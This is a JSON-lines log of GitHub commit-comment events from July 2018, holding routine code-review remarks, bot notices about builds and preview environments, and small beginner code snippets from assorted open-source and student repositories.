{"id":"7907569540","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"otrv4/otrv4"},"payload":{"comment":{"id":29568792,"position":7,"line":1688,"path":"otrv4.md","commit_id":"05446358ff3a4fb9f9366df478d0d4c124d4b97a","created_at":"2018-07-02T16:03:28Z","updated_at":"2018-07-02T16:03:28Z","author_association":"CONTRIBUTOR","body":"Shouldn't it  be \"Prekey Profile owner's instance tag\" here? I know it was there before, but just noticed it."}},"created_at":"2018-07-02T16:03:28Z"}
{"id":"7907570737","type":"CommitCommentEvent","actor":{"login":"vinay-deshmukh"},"repo":{"name":"vinay-deshmukh/MyLibApp"},"payload":{"comment":{"id":29568794,"position":17,"line":11,"path":"app/src/main/res/layout/frag_issued_books.xml","commit_id":"d87b8db98fcfb428f177aaea2228a2ce560a4e29","created_at":"2018-07-02T16:03:42Z","updated_at":"2018-07-02T16:03:42Z","author_association":"OWNER","body":"Use match parent for recycler view"}},"created_at":"2018-07-02T16:03:42Z"}
{"id":"7907580227","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"otrv4/otrv4"},"payload":{"comment":{"id":29568819,"position":22,"line":1457,"path":"otrv4.md","commit_id":"8da4ee16b1db36ce97f3cfcc44191022f0fd5a38","created_at":"2018-07-02T16:05:28Z","updated_at":"2018-07-02T16:05:28Z","author_association":"CONTRIBUTOR","body":"In IRC you said little-endian for this value. Which one is it?"}},"created_at":"2018-07-02T16:05:28Z"}
{"id":"7907586292","type":"CommitCommentEvent","actor":{"login":"screeni"},"repo":{"name":"electronero/electronero"},"payload":{"comment":{"id":29568830,"position":null,"line":null,"path":null,"commit_id":"8ea26460d1c773be68850551bcd766aad2076356","created_at":"2018-07-02T16:06:38Z","updated_at":"2018-07-02T16:06:38Z","author_association":"NONE","body":"Thanks to the creator of Monero is the base! I hope you will not forget to thank them?"}},"created_at":"2018-07-02T16:06:38Z"}
{"id":"7907586567","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29568831,"position":1,"line":56,"path":"testharness/src/main/java/com/axway/ats/harness/testng/AtsTestngTestListener.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T16:06:42Z","updated_at":"2018-07-02T16:06:42Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T16:06:42Z"}
{"id":"7907593349","type":"CommitCommentEvent","actor":{"login":"bobwhitelock"},"repo":{"name":"alces-software/alces-flight-center"},"payload":{"comment":{"id":29568855,"position":null,"line":null,"path":null,"commit_id":"e248893223d79c95f4e1e59ffb45d7c0f63b9a1a","created_at":"2018-07-02T16:07:59Z","updated_at":"2018-07-02T16:07:59Z","author_association":"MEMBER","body":"😂"}},"created_at":"2018-07-02T16:07:59Z"}
{"id":"7907593669","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29568856,"position":null,"line":null,"path":null,"commit_id":"01c8fff425ac98cacf9e634defb6d6d054a7d1c6","created_at":"2018-07-02T16:08:03Z","updated_at":"2018-07-02T16:08:03Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-child](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-child).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-child-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-02T16:08:03Z"}
{"id":"7907594901","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29568860,"position":null,"line":null,"path":null,"commit_id":"8bb0b165d6c13f3e3d41a09931249612d2904e79","created_at":"2018-07-02T16:08:16Z","updated_at":"2018-07-02T16:08:16Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-child](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-child).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-child-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-02T16:08:16Z"}
{"id":"7907594967","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29568861,"position":1,"line":33,"path":"testharness/src/main/java/com/axway/ats/harness/testng/AtsTestngSuiteListener.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T16:08:17Z","updated_at":"2018-07-02T16:08:17Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T16:08:17Z"}
{"id":"7907606422","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29568896,"position":1,"line":29,"path":"testharness/src/main/java/com/axway/ats/harness/testng/AtsTestngClassListener.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T16:10:33Z","updated_at":"2018-07-02T16:10:33Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T16:10:33Z"}
{"id":"7907607839","type":"CommitCommentEvent","actor":{"login":"agraf"},"repo":{"name":"Gateworks/uboot-newport"},"payload":{"comment":{"id":29568899,"position":18,"line":18,"path":"arch/arm/cpu/armv8/cvm-thunderx/lowlevel.S","commit_id":"4fcbd408dab39533c1b4b5cb837676b6de432acd","created_at":"2018-07-02T16:10:49Z","updated_at":"2018-07-02T16:10:49Z","author_association":"CONTRIBUTOR","body":"Where does this address come from? And where does the DTB come from? Is it built as part of U-Boot (in which case it should already be included in the binary) or does it get passed in from ATF? In the latter case, shouldn't it suffice to implement save_boot_params?"}},"created_at":"2018-07-02T16:10:49Z"}
{"id":"7907609781","type":"CommitCommentEvent","actor":{"login":"ekr"},"repo":{"name":"ekr/draft-rescorla-tls-esni"},"payload":{"comment":{"id":29568908,"position":10,"line":282,"path":"draft-rescorla-tls-esni.md","commit_id":"6790c4bb482c95a60dc8c8eac7559b509167cbd7","created_at":"2018-07-02T16:11:10Z","updated_at":"2018-07-02T16:11:10Z","author_association":"OWNER","body":"I agree, but it's also the case that there is going to be some clock skew,\nno?\n\nOn Mon, Jul 2, 2018 at 8:18 AM, Alessandro Ghedini <notifications@github.com\n> wrote:\n\n> The point of preventing clients to cache on not_after was to avoid exactly\n> this situation. If the server needs to keep keys around for N days anyway,\n> I don't think it makes sense to rotate them every M hours from a forward\n> secrecy perspective. A compromise of the server would expose all keys\n> anyway.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ekr/draft-rescorla-tls-esni/commit/6790c4bb482c95a60dc8c8eac7559b509167cbd7#commitcomment-29568165>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABD1oVymXtqZRSP5X-qMLPhlyIYGjj7Wks5uCjm9gaJpZM4U_f7o>\n> .\n>\n"}},"created_at":"2018-07-02T16:11:10Z"}
{"id":"7907616706","type":"CommitCommentEvent","actor":{"login":"jcw"},"repo":{"name":"jeelabs/jeeh"},"payload":{"comment":{"id":29568920,"position":14,"line":288,"path":"arch/stm32l0.h","commit_id":"ed817b4241ba9ebc2902f5701bbf13c05edf4b1b","created_at":"2018-07-02T16:12:25Z","updated_at":"2018-07-02T16:12:25Z","author_association":"MEMBER","body":"... and now, methinks this enable is redundant (just trying to understand, and stay obsessively \"minimal\")"}},"created_at":"2018-07-02T16:12:25Z"}
{"id":"7907619924","type":"CommitCommentEvent","actor":{"login":"zhuravel"},"repo":{"name":"talkable/talkable-docs"},"payload":{"comment":{"id":29568930,"position":28,"line":176,"path":"source/web_hooks/reward.rst","commit_id":"44f46eab2c92de05a2394e4275d8499106bf447c","created_at":"2018-07-02T16:13:05Z","updated_at":"2018-07-02T16:13:05Z","author_association":"MEMBER","body":"Extra spaces after `\"email\":` and `\"short_url_code\":`."}},"created_at":"2018-07-02T16:13:05Z"}
{"id":"7907621722","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29568938,"position":1,"line":31,"path":"testharness/src/main/java/com/axway/ats/harness/junit/AtsJunitTestListener.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T16:13:26Z","updated_at":"2018-07-02T16:13:26Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T16:13:26Z"}
{"id":"7907622302","type":"CommitCommentEvent","actor":{"login":"sithhell"},"repo":{"name":"STEllAR-GROUP/hpx"},"payload":{"comment":{"id":29568942,"position":44,"line":191,"path":"hpx/plugins/parcelport/tcp/sender.hpp","commit_id":"0d9a4253683b708936e09551477b5a30b7a6fa5e","created_at":"2018-07-02T16:13:33Z","updated_at":"2018-07-02T16:13:33Z","author_association":"MEMBER","body":"shouldn't we check if we already are on a HPX thread?"}},"created_at":"2018-07-02T16:13:33Z"}
{"id":"7907623282","type":"CommitCommentEvent","actor":{"login":"ibancg"},"repo":{"name":"patrolez/lingot"},"payload":{"comment":{"id":29568945,"position":null,"line":null,"path":null,"commit_id":"46b5bcd1af1374f26fa44ccfaec49742cdeee530","created_at":"2018-07-02T16:13:43Z","updated_at":"2018-07-02T16:13:43Z","author_association":"NONE","body":"Hi, I was thinking of doing the same. Send me a PR if you find the time, so I can include it before the release."}},"created_at":"2018-07-02T16:13:43Z"}
{"id":"7907623804","type":"CommitCommentEvent","actor":{"login":"aksh1618"},"repo":{"name":"AK-007/train-query-crawl"},"payload":{"comment":{"id":29568947,"position":107,"line":107,"path":"app.js","commit_id":"baa696f26ff7fedd1ae00cbcfaf9e19bed403c80","created_at":"2018-07-02T16:13:49Z","updated_at":"2018-07-02T16:13:49Z","author_association":"NONE","body":"That's not how caching works. You should check if internet connection is present. If it is, you should fetch fresh data because it might have changed since you last fetched, and should use local copy only if it isn't. What I'm saying is you're throwing an error when offline, instead of using the cached information."}},"created_at":"2018-07-02T16:13:49Z"}
{"id":"7907624404","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29568949,"position":72,"line":96,"path":"ruby_fourth.rb","commit_id":"eb5b412f4f171049bd23bf82d82c8a3a34fbac61","created_at":"2018-07-02T16:13:56Z","updated_at":"2018-07-02T16:13:56Z","author_association":"COLLABORATOR","body":"@tomoharutsutsumi \r\n\r\n> else index % 2 != 0という書き方はできない \r\n\r\nYESですよね。else について理解が浅い気がします。 else はどういうものだったのかチェックしてみてください。"}},"created_at":"2018-07-02T16:13:56Z"}
{"id":"7907624643","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29568951,"position":null,"line":null,"path":null,"commit_id":"e0287df13ab48787bdd637aceb7d58b580b748ee","created_at":"2018-07-02T16:13:58Z","updated_at":"2018-07-02T16:13:58Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-292](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-292).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-292-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-02T16:13:58Z"}
{"id":"7907630091","type":"CommitCommentEvent","actor":{"login":"MichMich"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":29568968,"position":null,"line":null,"path":null,"commit_id":"0e2e8d2e2aca2f8d0f1f2eb7b213577fcc4f623a","created_at":"2018-07-02T16:15:04Z","updated_at":"2018-07-02T16:15:04Z","author_association":"OWNER","body":"If someone sends a PR I’ll try to release an intermediate release to solve this issue. "}},"created_at":"2018-07-02T16:15:04Z"}
{"id":"7907633397","type":"CommitCommentEvent","actor":{"login":"datadanqin"},"repo":{"name":"datadanqin/Python"},"payload":{"comment":{"id":29568976,"position":null,"line":null,"path":null,"commit_id":"91f3a1d1532758d047881a2101c5eaf2d7d5e554","created_at":"2018-07-02T16:15:43Z","updated_at":"2018-07-02T16:15:43Z","author_association":"OWNER","body":"sssssss"}},"created_at":"2018-07-02T16:15:43Z"}
{"id":"7907635265","type":"CommitCommentEvent","actor":{"login":"ToeBee"},"repo":{"name":"kstateome/canvas-api"},"payload":{"comment":{"id":29568981,"position":5,"line":230,"path":"src/main/java/edu/ksu/canvas/net/SimpleRestClient.java","commit_id":"8766f4774c8402cfd00fab9e636cfc4fd4f5fa92","created_at":"2018-07-02T16:16:05Z","updated_at":"2018-07-02T16:16:05Z","author_association":"MEMBER","body":"This `statusCode == 400` case should already be handled down on line 250 where it is checking for any status code outside of the 200 range."}},"created_at":"2018-07-02T16:16:05Z"}
{"id":"7907635961","type":"CommitCommentEvent","actor":{"login":"dotlambda"},"repo":{"name":"ronf/asyncssh"},"payload":{"comment":{"id":29568982,"position":4,"line":211,"path":"tests/server.py","commit_id":"6a92930e00f3bbc67d9cdf66816917e64f2450e9","created_at":"2018-07-02T16:16:12Z","updated_at":"2018-07-02T16:16:12Z","author_association":"NONE","body":"I can confirm that this fixes the problem. Thank you very much for the quick response! Looking forward to the next release."}},"created_at":"2018-07-02T16:16:12Z"}
{"id":"7907642236","type":"CommitCommentEvent","actor":{"login":"tobyjamez"},"repo":{"name":"bombrun/GaiaLab"},"payload":{"comment":{"id":29568998,"position":null,"line":null,"path":null,"commit_id":"51444351682a389b4f46af8d97d4eff1f67b5520","created_at":"2018-07-02T16:17:26Z","updated_at":"2018-07-02T16:17:26Z","author_association":"COLLABORATOR","body":"This is a really insignificant commit, but was sufficiently different from the following and preceding commits to warrant its existence."}},"created_at":"2018-07-02T16:17:26Z"}
{"id":"7907643565","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29569000,"position":1,"line":28,"path":"testharness/src/main/java/com/axway/ats/harness/testng/AtsTestngListener.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T16:17:42Z","updated_at":"2018-07-02T16:17:42Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T16:17:42Z"}
{"id":"7907645493","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29569005,"position":null,"line":null,"path":null,"commit_id":"eb68ccb2bfb3d01807412e33399299da8cdb4b11","created_at":"2018-07-02T16:18:03Z","updated_at":"2018-07-02T16:18:03Z","author_association":"NONE","body":"158538153-Maximum-Curve-Output-is-always-ignored-#6365 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2929 of 2929 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eb68ccb2bfb3d01807412e33399299da8cdb4b11-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eb68ccb2bfb3d01807412e33399299da8cdb4b11-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-02T16:18:03Z"}
{"id":"7907647309","type":"CommitCommentEvent","actor":{"login":"alexcrichton"},"repo":{"name":"rustwasm/wasm-bindgen"},"payload":{"comment":{"id":29569008,"position":5,"line":47,"path":"tests/all/webidl/simple.rs","commit_id":"d123bedc202fdb1f1867d83a17f128cc6f2e206a","created_at":"2018-07-02T16:18:25Z","updated_at":"2018-07-02T16:18:25Z","author_association":"COLLABORATOR","body":"FWIW I've tracked this down to an [LLVM bug](https://bugs.llvm.org/show_bug.cgi?id=38019) and have opened a rustc bug at https://github.com/rust-lang/rust/issues/51986"}},"created_at":"2018-07-02T16:18:25Z"}
{"id":"7907648016","type":"CommitCommentEvent","actor":{"login":"melongist"},"repo":{"name":"zhblue/hustoj"},"payload":{"comment":{"id":29569010,"position":null,"line":null,"path":null,"commit_id":"250f3998aff4cf3f30569bd1789ba35378790e60","created_at":"2018-07-02T16:18:33Z","updated_at":"2018-07-02T16:18:33Z","author_association":"NONE","body":"added:\r\n\r\nkindeditor coma input error fix for https://github.com/zhblue/hustoj/issues/293"}},"created_at":"2018-07-02T16:18:33Z"}
{"id":"7907648845","type":"CommitCommentEvent","actor":{"login":"Ckingbigdata"},"repo":{"name":"martin-martin/nlpython"},"payload":{"comment":{"id":29569012,"position":29,"line":29,"path":"martin_1.py","commit_id":"6db4004e1f9f45b57fb260a7cec1ae6aaaadfe5b","created_at":"2018-07-02T16:18:44Z","updated_at":"2018-07-02T16:18:44Z","author_association":"NONE","body":"hiking = [\"devil's den\", \"old lady\", \"north rim\", \"where angel's fly\"]\r\nprint(hiking)\r\nhiking.extend([\"martin's trail\", \"casey's swimlane\"])\r\nprint(hiking)\r\nimport string\r\nhiking_capped = \", \".join(hiking)\r\nstring.capwords(hiking_capped)\r\nprint(string.capwords(hiking_capped))\r\nprint(type(hiking_capped))\r\n# This returns: Devil's Den, Old Lady, North Rim, Where Angel's Fly, Martin's Trail, Casey's Swimlane\r\n# But when I try to create a list, using the list() method, it parses each letter, rather than each word\r\n# And not in caps! So, I'm back to square one.\r\nnew_list = list(hiking_capped)\r\nprint(new_list)\r\n# Like this: 'd', 'e', 'v', 'i', 'l', \"'\", 's', ' ', 'd', 'e', 'n', ', etc.\r\n# How can I create a new list of words, rather than letters?\r\n# when I append, it creates a list, but not with appropriate caps\r\nnew_list = []\r\nnew_list.append(hiking_capped)\r\nprint(new_list)\r\n#like this [\"devil's den, old lady, north rim, where angel's fly, martin's trail, casey's swimlane\"]\r\n# Again, back to square one.\r\n# There must be a way of doing this, without converting everything to a string\r\n# And then back to a list\r\n# Okay, let's consider some list functions, or iteration over the list to do what we want"}},"created_at":"2018-07-02T16:18:44Z"}
{"id":"7907649081","type":"CommitCommentEvent","actor":{"login":"Geograph-us"},"repo":{"name":"Geograph-us/Cloud-Mail.Ru-Downloader"},"payload":{"comment":{"id":29569013,"position":null,"line":null,"path":null,"commit_id":"7ab4165cc8eb730aa23f9fce80af39dd73a70033","created_at":"2018-07-02T16:18:47Z","updated_at":"2018-07-02T16:18:47Z","author_association":"OWNER","body":"Пробовали версию с php? https://github.com/Geograph-us/Cloud-Mail.Ru-Downloader/releases/download/1.0.2/Cloud.Mail.Ru.Downloader.-.with.php-win.7z\r\nНадо в links.txt поместить эту Вашу ссылку и запустить start.bat после этого"}},"created_at":"2018-07-02T16:18:47Z"}
{"id":"7907656839","type":"CommitCommentEvent","actor":{"login":"PhsTigers"},"repo":{"name":"PhsTigers/Object_Fractal"},"payload":{"comment":{"id":29569023,"position":null,"line":null,"path":null,"commit_id":"c7be9cb516b974c59cb4bd5428e05b4a58670f2d","created_at":"2018-07-02T16:20:22Z","updated_at":"2018-07-02T16:20:22Z","author_association":"OWNER","body":"going to add more branches to the tree project."}},"created_at":"2018-07-02T16:20:22Z"}
{"id":"7907658685","type":"CommitCommentEvent","actor":{"login":"the-daniel-rothig"},"repo":{"name":"DFE-Digital/manage-courses-ui"},"payload":{"comment":{"id":29569026,"position":16,"line":28,"path":"src/api-client/ApiClient.csproj","commit_id":"144ba159cceeaf7d055690f32a217d21d6e42a32","created_at":"2018-07-02T16:20:43Z","updated_at":"2018-07-02T16:20:43Z","author_association":"CONTRIBUTOR","body":"n.b.!"}},"created_at":"2018-07-02T16:20:43Z"}
{"id":"7907660217","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29569031,"position":1,"line":15,"path":"agent/webapps/client/src/main/java/com/axway/ats/agent/webapp/client/listeners/TestcaseStateListener.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T16:21:02Z","updated_at":"2018-07-02T16:21:02Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T16:21:02Z"}
{"id":"7907672754","type":"CommitCommentEvent","actor":{"login":"ccaballerof"},"repo":{"name":"NicolasFG/ProyectoUtec"},"payload":{"comment":{"id":29569066,"position":null,"line":null,"path":null,"commit_id":"84db18e591eeaed5e2b0b575d195deb203f2e788","created_at":"2018-07-02T16:23:35Z","updated_at":"2018-07-02T16:23:35Z","author_association":"NONE","body":"print(\"Hola\""}},"created_at":"2018-07-02T16:23:35Z"}
{"id":"7907673434","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29569069,"position":null,"line":null,"path":null,"commit_id":"89aa1980a8968b96882b58998fe0abd7c45f8023","created_at":"2018-07-02T16:23:43Z","updated_at":"2018-07-02T16:23:43Z","author_association":"COLLABORATOR","body":"Reworked the port. BTW: It would be useful if you put the complete AWK command used in the log file (or in the documentation on the wiki). I haven't figured out what this would translate to for using AWK on the command line. And always doing \"env ENTERAFTER=install ravenadm test xyz\" and waiting for the project to build just so I can check if the extracted terms are correct is a waste of time."}},"created_at":"2018-07-02T16:23:43Z"}
{"id":"7907677612","type":"CommitCommentEvent","actor":{"login":"cosminzz"},"repo":{"name":"cosminzz/2DCar"},"payload":{"comment":{"id":29569080,"position":null,"line":null,"path":null,"commit_id":"02b6cea0ab7c171f58cb97050f8884cb9f4b60a5","created_at":"2018-07-02T16:24:32Z","updated_at":"2018-07-02T16:24:32Z","author_association":"OWNER","body":"Hope it works"}},"created_at":"2018-07-02T16:24:32Z"}
{"id":"7907679815","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29569085,"position":null,"line":null,"path":null,"commit_id":"44bd0f972916ff7720879ac4e3d0fbd078438f72","created_at":"2018-07-02T16:24:58Z","updated_at":"2018-07-02T16:24:58Z","author_association":"COLLABORATOR","body":"Sure, it's not like I'm out of ideas on what to do instead. ;)"}},"created_at":"2018-07-02T16:24:58Z"}
{"id":"7907679925","type":"CommitCommentEvent","actor":{"login":"tcbrindle"},"repo":{"name":"tcbrindle/NanoRange"},"payload":{"comment":{"id":29569086,"position":null,"line":null,"path":null,"commit_id":"95038e595ef5f1cb04e225d6715ed49ae6fb9063","created_at":"2018-07-02T16:24:59Z","updated_at":"2018-07-02T16:24:59Z","author_association":"OWNER","body":"I should probably have put \"steal\" in quotes; I meant \"use it in accordance with the licence\", of course :)\r\n\r\nI might try it out on a branch and see how it goes. My only concern is that the preprocessor magic it weaves is way beyond my ability to understand, let alone debug..."}},"created_at":"2018-07-02T16:24:59Z"}
{"id":"7907700220","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29569122,"position":5,"line":6600,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"12d639fe332954cdac907eef1bb391b13ab95060","created_at":"2018-07-02T16:28:59Z","updated_at":"2018-07-02T16:28:59Z","author_association":"COLLABORATOR","body":"Yes. Do you think that should be seperated from the other sense of gir?"}},"created_at":"2018-07-02T16:28:59Z"}
{"id":"7907702783","type":"CommitCommentEvent","actor":{"login":"apmuthu"},"repo":{"name":"apmuthu/FA24extensions"},"payload":{"comment":{"id":29569125,"position":null,"line":null,"path":null,"commit_id":"9c68c93071d9895f55585788a210dcefc0a80196","created_at":"2018-07-02T16:29:31Z","updated_at":"2018-07-02T16:29:31Z","author_association":"OWNER","body":"The core file 'includes/ui/ui_view.inc' has been extended by @braathwaate among others to include these two functions:\r\n`set_posts()`\r\n`get_js_history()`\r\n\r\nThey are used in `bank_gl_inquiry` and `sales_map` modules apart from his `pl_dimensions` module.\r\nThis commit comments out the use of these functions till such time the core assimilates it. They have no impact on the output but enhances the user interface by remembering previously entered values.\r\n\r\n"}},"created_at":"2018-07-02T16:29:31Z"}
{"id":"7907705081","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29569132,"position":1,"line":30,"path":"agent/webapps/client/src/main/java/com/axway/ats/agent/webapp/client/AgentConfigurationClient.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T16:30:02Z","updated_at":"2018-07-02T16:30:02Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T16:30:02Z"}
{"id":"7907707889","type":"CommitCommentEvent","actor":{"login":"juanystefano"},"repo":{"name":"juanystefano/project-of-icc"},"payload":{"comment":{"id":29569146,"position":null,"line":null,"path":null,"commit_id":"b6bebabb65a6f0c86f72079d74ad897b781cb4d5","created_at":"2018-07-02T16:30:35Z","updated_at":"2018-07-02T16:30:35Z","author_association":"OWNER","body":"import os\r\nimport sys\r\n\r\np = input()\r\np_part = p.split(\",\")\r\nn = int(p_part[0])\r\nm= int(p_part[1])\r\nlista = []\r\nif n > 0:\r\n    if n >= m > 0:\r\n        for i in range(n):\r\n            x = int(input())\r\n            lista.append(x)\r\n            q = lista[n-m:]\r\n        print(tuple(q))\r\n    else:\r\n        print(\"Invalid input\")\r\nelse:\r\n    print(\"Invalid input\")"}},"created_at":"2018-07-02T16:30:35Z"}
{"id":"7907707922","type":"CommitCommentEvent","actor":{"login":"ericniebler"},"repo":{"name":"tcbrindle/NanoRange"},"payload":{"comment":{"id":29569147,"position":null,"line":null,"path":null,"commit_id":"95038e595ef5f1cb04e225d6715ed49ae6fb9063","created_at":"2018-07-02T16:30:35Z","updated_at":"2018-07-02T16:30:35Z","author_association":"NONE","body":"Yes, it is not for the faint of heart. It also comes with no docs, and there are some gotchas. If your concept definition has a `requires`, it must be the first thing. Likewise for `requires`-expressions in a `requires` clause, and `requires`-expressions cannot have argument lists. Lots of the syntax for real `requires` clauses is not supported well or at all. Your best bet is to punch this into godbolt with the -E flag to see what comes out of the preprocessor both with and without -fmodules. Good luck."}},"created_at":"2018-07-02T16:30:35Z"}
{"id":"7907710015","type":"CommitCommentEvent","actor":{"login":"ghareeb-falazi"},"repo":{"name":"web3j/web3j-maven-plugin"},"payload":{"comment":{"id":29569155,"position":null,"line":null,"path":null,"commit_id":"72e692baa9986cf496f0595ea96d638290265ab2","created_at":"2018-07-02T16:31:00Z","updated_at":"2018-07-02T16:31:00Z","author_association":"NONE","body":"Is this commit going into a release soon? I need it because my smart contracts use the keyword emit with events which is first supported in 0.4.21"}},"created_at":"2018-07-02T16:31:00Z"}
{"id":"7907715328","type":"CommitCommentEvent","actor":{"login":"GBH"},"repo":{"name":"comfy/comfortable-mexican-sofa"},"payload":{"comment":{"id":29569168,"position":null,"line":null,"path":null,"commit_id":"70011e47674a702d3a3048f8286486e452aa850b","created_at":"2018-07-02T16:32:09Z","updated_at":"2018-07-02T16:32:09Z","author_association":"MEMBER","body":"Can you create issue here please https://github.com/comfy/comfy-bootstrap-form"}},"created_at":"2018-07-02T16:32:09Z"}
{"id":"7907715473","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29569169,"position":null,"line":null,"path":null,"commit_id":"89aa1980a8968b96882b58998fe0abd7c45f8023","created_at":"2018-07-02T16:32:10Z","updated_at":"2018-07-02T16:32:10Z","author_association":"COLLABORATOR","body":"Makes sense. Still it would be nice to know how ravenadm is invoking the actual AWK command."}},"created_at":"2018-07-02T16:32:10Z"}
{"id":"7907718591","type":"CommitCommentEvent","actor":{"login":"fkorotkov"},"repo":{"name":"hexito/ccbaltics-app"},"payload":{"comment":{"id":29569175,"position":6,"line":7,"path":".cirrus.yml","commit_id":"4ef6b06ca049683fc74ad3d4bd1edd9f6a7736c0","created_at":"2018-07-02T16:32:49Z","updated_at":"2018-07-02T16:32:49Z","author_association":"NONE","body":"@mahex Some mac builds were failing due to issues from our mac infrastructure provider. But now it should be all good. Sorry for the inconvenience. You can uncomment it now 😅"}},"created_at":"2018-07-02T16:32:49Z"}
{"id":"7907718699","type":"CommitCommentEvent","actor":{"login":"apmuthu"},"repo":{"name":"apmuthu/FA24extensions"},"payload":{"comment":{"id":29569177,"position":null,"line":null,"path":null,"commit_id":"2d03b66b6aa6bd8d1992e4559f55ef5d6afc8c26","created_at":"2018-07-02T16:32:50Z","updated_at":"2018-07-02T16:32:50Z","author_association":"OWNER","body":"![enhanced_cust_statement](https://user-images.githubusercontent.com/2995044/42175614-a73f2250-7e43-11e8-8304-657f48e623c5.png)\r\n"}},"created_at":"2018-07-02T16:32:50Z"}
{"id":"7907719135","type":"CommitCommentEvent","actor":{"login":"Fgarcia19"},"repo":{"name":"NicolasFG/ProyectoUtec"},"payload":{"comment":{"id":29569179,"position":1,"line":1,"path":"README.md","commit_id":"84db18e591eeaed5e2b0b575d195deb203f2e788","created_at":"2018-07-02T16:32:56Z","updated_at":"2018-07-02T16:32:56Z","author_association":"NONE","body":"ada\r\n"}},"created_at":"2018-07-02T16:32:56Z"}
